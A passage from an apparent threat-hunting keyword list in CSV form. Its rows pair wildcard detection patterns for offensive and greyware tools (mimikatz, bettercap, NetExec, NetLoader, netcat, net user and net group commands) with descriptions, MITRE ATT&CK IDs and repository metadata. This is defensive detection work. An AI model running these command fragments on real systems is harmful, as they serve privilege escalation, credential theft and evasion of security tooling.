- T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*net rpc group members 'Domain admins' -U *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*net rpc group members 'Domain Users' -W *,greyware_tool_keyword,samba,The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list,T1087.002 - T1003.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*net start SysUpdate*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net user /add icebreaker *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*net user HackMe *,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*net user john H4x00r123*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*net view /all /domain*,greyware_tool_keyword,net,display all domain names on the network,T1016 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*net* group Administrator* /add /domain*,greyware_tool_keyword,net,adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.,T1098,TA0003,N/A,N/A,Persistence,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*net.fuzz *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.fuzz.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.probe on,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.probe on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.sniff *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net::alias*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::deleg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::group*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::if*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::serverinfo*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::session*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::share*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::stats*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::tod*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::user*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::wsession*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net_dclist *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*net_localgroup_member -Group*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*net_portscan.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*net_recon.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net1 localgroup admin*,greyware_tool_keyword,net,showing users in a privileged group. ,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*netCat*,greyware_tool_keyword,netcat,Netcat is a featured networking utility which reads and writes data across network connections,T1043 - T1052 - T1071 - T1095 - T1132 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,http://netcat.sourceforge.net/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net-creds*,offensive_tool_keyword,net-creds,Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.,T1040 - T1039 - T1036 - T1003,TA0006 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/net-creds,1,0,N/A,N/A,10,1560,443,2022-03-23T10:40:42Z,2015-01-07T18:47:46Z -*netdiscover -i * -r */24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*netero1010/Quser-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*netero1010/ScheduleRunner*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*netero1010/ServiceMove-BOF*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*NetExec ldap * --*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec ldap * --dc-ip*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec ldap * -M enum_trusts*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec winrm *--*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec-main.zip*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Net-GPPPassword.cs*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword.exe*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword_dotNET*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*Net-GPPPassword-master*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*nethunter-*.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nethunter-*.zip*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nethunter-*-oos-ten-kalifs-full.zip*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netlm_downgrade.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NETLMv2_fmt_plug.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetLoader.exe --path *.exe *,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*NetLoader-master*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*netloggedonusers.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - 